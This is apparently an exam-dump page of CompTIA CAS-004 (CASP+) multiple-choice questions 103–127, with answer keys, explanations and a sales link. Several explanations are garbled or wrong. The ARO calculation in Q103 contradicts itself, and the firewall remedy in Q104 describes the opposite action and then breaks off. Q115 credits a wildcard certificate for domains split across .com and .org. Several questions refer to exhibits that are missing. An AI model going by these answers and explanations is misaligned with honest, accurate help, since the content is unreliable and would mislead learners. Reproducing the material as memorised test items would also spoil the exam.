CAS-004 Practice Exam and Study Guides - Verified By TestValid Updated 362 Questions [Q103-Q127]

CAS-004 Practice Exam and Study Guides - Verified By TestValid Updated 362 Questions

2024 Updated Verified Pass CAS-004 Study Guides & Best Courses

NEW QUESTION # 103
A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.
Which of the following should the engineer report as the ARO for successful breaches?

• A. 0.5
• B. 0
• C. 1
• D. 36,500

Answer: A

Explanation:
To calculate the ARO for successful breaches, the security engineer should divide the number of successful breaches (2) by the number of years that the data has been breached (4), and then multiply the result by the number of days in a year (365). This would give the following equation:
ARO = (2 / 4) * 365 = 0.005
Therefore, the ARO for successful breaches is 0.005, or approximately 0.5% per year.

NEW QUESTION # 104
A security engineer needs to review the configurations of several devices on the network to meet the following requirements:
* The PostgreSQL server must only allow connectivity in the 10.1.2.0/24 subnet.
* The SSH daemon on the database server must be configured to listen
to port 4022.
* The SSH daemon must only accept connections from a Single
workstation.
* All host-based firewalls must be disabled on all workstations.
* All devices must have the latest updates from within the past eight
days.
* All HDDs must be configured to secure data at rest.
* Cleartext services are not allowed.
* All devices must be hardened when possible.
Instructions:
Click on the various workstations and network devices to review the posture assessment results. Remediate any possible issues or indicate that no issue is found.
Click on Server A to review output dat
a. Select commands in the appropriate tab to remediate connectivity problems to the pOSTGREsql DATABASE VIA ssh

WAP A

PC A

Laptop A

Switch A

Switch B:

Laptop B

PC B

PC C

Server A

Answer:

Explanation:
See the Explanation below for the solution
Explanation:
WAP A: No issue found. The WAP A is configured correctly and meets the requirements.
PC A = Enable host-based firewall to block all traffic
This option will turn off the host-based firewall and allow all traffic to pass through. This will comply with the requirement and also improve the connectivity of PC A to other devices on the network. However, this option will also reduce the security of PC A and make it more vulnerable to attacks. Therefore, it is recommended to use other security measures, such as antivirus, encryption, and password complexity, to protect PC A from potential threats.
Laptop A: Patch management
This option will install the updates that are available for Laptop A and ensure that it has the most recent security patches and bug fixes. This will comply with the requirement and also improve the performance and stability of Laptop A. However, this option may also require a reboot of Laptop A and some downtime during the update process. Therefore, it is recommended to backup any important data and close any open applications before applying the updates.
Switch A: No issue found. The Switch A is configured correctly and meets the requirements.
Switch B: No issue found. The Switch B is configured correctly and meets the requirements.
Laptop B: Disable unneeded services
This option will stop and disable the telnet service that is using port 23 on Laptop B. Telnet is a cleartext service that transmits data in plain text over the network, which exposes it to eavesdropping, interception, and modification by attackers. By disabling the telnet service, you will comply with the requirement and also improve the security of Laptop B. However, this option may also affect the functionality of Laptop B if it needs to use telnet for remote administration or other purposes. Therefore, it is recommended to use a secure alternative to telnet, such as SSH or HTTPS, that encrypts the data in transit.
PC B: Enable disk encryption
This option will encrypt the HDD of PC B using a tool such as BitLocker or VeraCrypt. Disk encryption is a technique that protects data at rest by converting it into an unreadable format that can only be decrypted with a valid key or password. By enabling disk encryption, you will comply with the requirement and also improve the confidentiality and integrity of PC B's data. However, this option may also affect the performance and usability of PC B, as it requires additional processing time and user authentication to access the encrypted data. Therefore, it is recommended to backup any important data and choose a strong key or password before encrypting the disk.
PC C: Disable unneeded services
This option will stop and disable the SSH daemon that is using port 22 on PC C. SSH is a secure service that allows remote access and command execution over an encrypted channel. However, port 22 is the default and well-known port for SSH, which makes it a common target for brute-force attacks and port scanning. By disabling the SSH daemon on port 22, you will comply with the requirement and also improve the security of PC C. However, this option may also affect the functionality of PC C if it needs to use SSH for remote administration or other purposes. Therefore, it is recommended to enable the SSH daemon on a different port, such as 4022, by editing the configuration file using the following command:
sudo nano /etc/ssh/sshd_config
Server A. Need to select the following:

NEW QUESTION # 105
Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future?

• A. BCP
• B. RTO
• C. BIA
• D. BCM
• E. SLA

Answer: A

Explanation:
A Business Continuity Plan (BCP) is a set of policies and procedures that outline how an organization should respond to and recover from disruptions [1]. It is designed to ensure that critical operations and services can be quickly restored and maintained, and should include steps to identify risks, develop plans to mitigate those risks, and detail the procedures to be followed in the event of a disruption. Resources:
CompTIA Advanced Security Practitioner (CASP+) Study Guide, Chapter 4: "Business Continuity Planning," Wiley, 2018. https://www.wiley.com/en-us/CompTIA+Advanced+Security+Practitioner+CASP%2B+Study+Guide%2C+2nd+Edition-p-9781119396582

NEW QUESTION # 106
An electric car company hires an IT consulting company to improve the cybersecurity of us vehicles.
Which of the following should achieve the BEST long-term result for the company?

• A. Designing Developing add-on security components for fielded vehicles
• B. Reviewing proposed designs and prototypes for cybersecurity vulnerabilities
• C. Reviewing and influencing requirements for an early development vehicle
• D. Performing a cyber-risk assessment on production vehicles

Answer: B

NEW QUESTION # 107
In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?

• A. Application/platform software
• B. Application user access management
• C. Application-specific data assets
• D. Application-specific logic and code

Answer: A

Explanation:
A) Application-specific data assets are the responsibility of the organization in a PaaS implementation. The organization owns and controls its own data and must ensure its confidentiality, integrity, and availability. The organization must also comply with any applicable data protection laws and regulations.
B) Application user access management is the responsibility of the organization in a PaaS implementation. The organization must define and enforce its own policies and procedures for granting, revoking, and monitoring access to its applications and data. The organization must also ensure that its users follow security best practices such as strong passwords and multifactor authentication.
C) Application-specific logic and code are the responsibility of the organization in a PaaS implementation. The organization must develop, test, deploy, and manage its own applications using the tools and services provided by the platform. The organization must also ensure that its applications are secure, reliable, and performant.
https://www.techtarget.com/searchcloudcomputing/feature/The-cloud-shared-responsibility-model-for-IaaS-PaaS-and-SaaS Explanation:
In a PaaS implementation, the provider offers relief to the organization's teams by sharing in many of the operational duties related to the application/platform software. The provider is responsible for securing and maintaining the underlying infrastructure, operating systems, middleware, runtime environments, and other software components that support the platform and the applications running on it. The provider also handles tasks such as patching, updating, scaling, and backing up the platform software.

NEW QUESTION # 108
Device event logs sources from MDM software as follows:

Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?

• A. Falsified status reporting; remotely wipe the device.
• B. Impossible travel; disable the device's account and access while investigating.
• C. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
• D. Resource leak; recover the device for analysis and clean up the local storage.

Answer: C

NEW QUESTION # 109
A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable?

• A. Containerization
• B. Type 2 hypervisors
• C. Virtualized emulators
• D. Orchestration

Answer: A

Explanation:
Containerization is a technology that allows applications to run in isolated and portable environments called containers. Containers are lightweight and self-contained units that include all the dependencies, libraries, and configuration files needed for an application to run. Containers can be deployed on any platform that supports the container runtime engine, such as Docker or Kubernetes.
Containerization would allow the company to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components, because containerization would:
Enable the application to be split into smaller and independent components (microservices) that can communicate with each other through APIs or message queues.
Allow the application to leverage cloud native services, such as load balancers, databases, or serverless functions, that can be integrated with containers through configuration files or environment variables.
Enhance the security of the application by isolating each container from other containers and the host system, and applying fine-grained access control policies and network rules to each container or group of containers.
Ensure the portability of the application by enabling it to run on any cloud provider or platform that supports containers, without requiring any changes to the application code or configuration.

NEW QUESTION # 110
A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.
Which of the following will MOST likely secure the data on the lost device?

• A. Require MFA to access company applications.
• B. Remotely wipe the device.
• C. Require a VPN to be active to access company data.
• D. Set up different profiles based on the person's risk.

Answer: A

NEW QUESTION # 111
An organization recently recovered from an attack that featured an adversary injecting Malicious logic into OS bootloaders on endpoint devices Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the IJEFI through the full loading of OS components. of the following TPM structures enables this storage functionality?

• A. Platform configuration registers
• B. Clock/counter structures
• C. Endorsement tickets
• D. Command tag structures with MAC schemes

Answer: A

Explanation:
Explanation
TPMs provide the ability to store measurements of code and data that can be used to ensure that code and data remain unchanged over time. This is done through Platform Configuration Registers (PCRs), which are structures used to store measurements of code and data. The measurements are taken during the boot process and can be used to compare the state of the system at different times, which can be used to detect any changes to the system and verify that the system has not been tampered with.

NEW QUESTION # 112
A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:
Despite the deny message, this action was still permit following is the MOST likely fix for this issue?

• A. Create separate domain and context files for irc.
• B. Rebuild the policy, reinstall, and test.
• C. Add the objects of concern to the default context.
• D. Set the devices to enforcing

Answer: D

NEW QUESTION # 113
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

• A. Install anti-malware. HIPS, and host-based firewalls on each of the systems
• B. Migrate the services to new systems with a supported and patched OS.
• C. Patch the systems to the latest versions of the existing OSs
• D. Segment the systems to reduce the attack surface if an attack occurs

Answer: B

NEW QUESTION # 114
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt?

• A. OWASP
• B. OSINT
• C. MITRE ATT&CK
• D. ISO

Answer: C

Explanation:
MITRE ATT&CK is a threat management framework that provides a comprehensive and detailed knowledge base of adversary tactics and techniques based on real-world observations. It can help security analysts to identify, understand, and prioritize potential threats, as well as to develop effective detection and response strategies. MITRE ATT&CK covers the entire lifecycle of a cyberattack, from initial access to impact, and provides information on how to mitigate, detect, and hunt for each technique. It also includes threat actor profiles, software descriptions, and data sources that can be used for threat intelligence and analysis. MITRE ATT&CK is the most likely resource that a security analyst would adopt to implement the most up-to-date and effective security methodologies for their clients. Verified References:
https://attack.mitre.org/
https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-top-10-mitre-att

NEW QUESTION # 115
A cloud security engineer is setting up a cloud-hosted WAF. The engineer needs to implement a solution to protect the multiple websites the organization hosts. The organization websites are:
* www.mycompany.org
* www.mycompany.com
* campus.mycompany.com
* wiki. mycompany.org
The solution must save costs and be able to protect all websites. Users should be able to notify the cloud security engineer of any on-path attacks. Which of the following is the BEST solution?

• A. Purchase one SAN certificate.
• B. Purchase one wildcard certificate.
• C. Purchase one certificate for each website.
• D. Implement self-signed certificates.

Answer: B

Explanation:
Explanation
Purchasing one wildcard certificate is the best solution to protect multiple websites hosted by an organization in a cloud-hosted WAF. A wildcard certificate is a type of SSL/TLS certificate that can secure a domain name and any number of its subdomains with a single certificate. For example, a wildcard certificate for
*.mycompany.com can secure www.mycompany.com, campus.mycompany.com, and any other subdomain under mycompany.com. A wildcard certificate can save costs and simplify management compared to purchasing individual certificates for each website.
References: [CompTIA CASP+ Study Guide, Second Edition, page 301]

NEW QUESTION # 116
A security analyst observes the following while looking through network traffic in a company's cloud log:

Which of the following steps should the security analyst take FIRST?

• A. Access 10.0.5.52 via EDR and identify processes that have network connections.
• B. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
• C. Isolate 10.0.50.6 via security groups.
• D. Quarantine 10.0.5.52 and run a malware scan against the host.

Answer: D

NEW QUESTION # 117
An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft. Which of the following can be used to mitigate this risk?

• A. A complete backup that is created before moving the data
• B. Additional application firewall rules specific to the migration
• C. An additional layer of encryption
• D. A third-party data integrity monitoring solution

Answer: C

Explanation:
The company should use an additional layer of encryption to secure the data from theft when moving to a CSP. Encryption is a process of transforming data into an unreadable format using a secret key. Encryption can protect the data from unauthorized access or modification during transit and at rest. Encryption can be applied at different levels, such as disk, file, or application. An additional layer of encryption can provide an extra security measure on top of the encryption provided by the CSP. Verified Reference:
https://learn.microsoft.com/en-us/partner-center/transition-seat-based-services
https://cloud.google.com/architecture/patterns-for-connecting-other-csps-with-gcp

NEW QUESTION # 118
Ransomware encrypted the entire human resources fileshare for a large financial institution.
Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?

• A. Leave the current backup schedule intact and make the human resources fileshare read-only.
• B. Decrease the frequency of backups and pay the ransom to decrypt the data.
• C. Leave the current backup schedule intact and pay the ransom to decrypt the data.
• D. Increase the frequency of backups and create SIEM alerts for IOCs.

Answer: D

Explanation:
It is not advisable to pay the ransom in a ransomware attack, as this only encourages the attackers and does not guarantee that the data will actually be decrypted. Instead, the management team should consider increasing the frequency of backups to meet the RPO requirements for the human resources fileshare. Additionally, implementing SIEM alerts for indicators of compromise (IOCs) can help to detect and prevent future ransomware attacks.

NEW QUESTION # 119
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card dat a. Which of the following commands should the analyst run to BEST determine whether financial data was lost?

• A. Option A
• B. Option B
• C. Option C
• D. Option D

Answer: C

NEW QUESTION # 120
A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection?

• A. HSM
• B. PKI
• C. UEFI/BIOS
• D. TPM

Answer: D

Explanation:
A TPM (trusted platform module) is a hardware device that can provide boot loader protection by storing cryptographic keys and verifying the integrity of the boot process. An HSM (hardware security module) is similar to a TPM, but it is used for storing keys for applications, not for booting. A PKI (public key infrastructure) is a system of certificates and keys that can provide encryption and authentication, but not boot loader protection. UEFI/BIOS are firmware interfaces that control the boot process, but they do not provide protection by themselves. Verified Reference: https://www.comptia.org/blog/what-is-a-tpm-trusted-platform-module https://partners.comptia.org/docs/default-source/resources/casp-content-guide

NEW QUESTION # 121
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

• A. Patch the infrastructure at the operating system.
• B. Upgrade the service as part of life-cycle management.
• C. Securely configure the authentication mechanisms.
• D. Execute port scanning against the services.

Answer: C

Explanation:
The questions is asking for an answer that is specific to the DevOps role. The most important security responsibility for the DevOps team in this scenario would be to securely configure the authentication mechanisms.
Patching the infrastructure at the operating system level, executing port scanning against the services, and upgrading the service as part of life-cycle management are all important security responsibilities, but they are not as critical as securely configuring the authentication mechanisms in this context.

NEW QUESTION # 122
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

• A. Worm
• B. Fileless
• C. Rootkit
• D. Logic bomb

Answer: B

Explanation:
Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack.

NEW QUESTION # 123
Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

• A. Reconfigure the WAF.
• B. Review the Active Directory.
• C. Update the marketing department's browser.
• D. Modify the ACLs.

Answer: D

Explanation:
Explanation
Modifying the ACLs (access control lists) is the most likely solution to avoid the intermittent access issues with the new cloud application. ACLs are used to define permissions for different users and groups to access resources on a network. The problem may be caused by incorrect or missing ACLs for the marketing department that prevent them from accessing the cloud application or its data sources. The other options are either irrelevant or less effective for the given scenario

NEW QUESTION # 124
Which of the following testing plans is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions?

• A. Parallel test
• B. Full interruption test
• C. Disaster recovery checklist
• D. Tabletop exercise

Answer: D

Explanation:
A tabletop exercise is a type of testing plan that is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions. A tabletop exercise is a simulation of a potential disaster or incident that involves a verbal or written discussion of how each department would respond to it. The purpose of a tabletop exercise is to identify gaps, weaknesses, or conflicts in the disaster recovery plan, and to improve communication and coordination among the team members.

NEW QUESTION # 125
Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?

• A. Trust models
• B. Key escrow
• C. TPM
• D. Code signing

Answer: B

Explanation:
Key Escrow is storing of private encryption/decryption files safely.

NEW QUESTION # 126
A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?

• A. Asynchronous keys
• B. Homomorphic encryption
• C. Data lake
• D. Machine learning

Answer: B

Explanation:
The organization is implementing homomorphic encryption. Homomorphic encryption is a type of encryption that allows computations to be performed on encrypted data without decrypting it first. This means that the organization can analyze the customers' data and deliver analysis results without being able to see the raw data, preserving the privacy and confidentiality of the customers. Homomorphic encryption can enable various applications, such as cloud computing, machine learning, and data analytics, that require processing sensitive data without compromising security. Verified Reference:
https://www.techtarget.com/searchsecurity/definition/homomorphic-encryption
https://learn.microsoft.com/en-us/azure/security/fundamentals/encryption-at-rest
https://www.ibm.com/topics/homomorphic-encryption

NEW QUESTION # 127
......

Ultimate Guide to the CAS-004 - Latest Edition Available Now: https://passtorrent.testvalid.com/CAS-004-valid-exam-test.html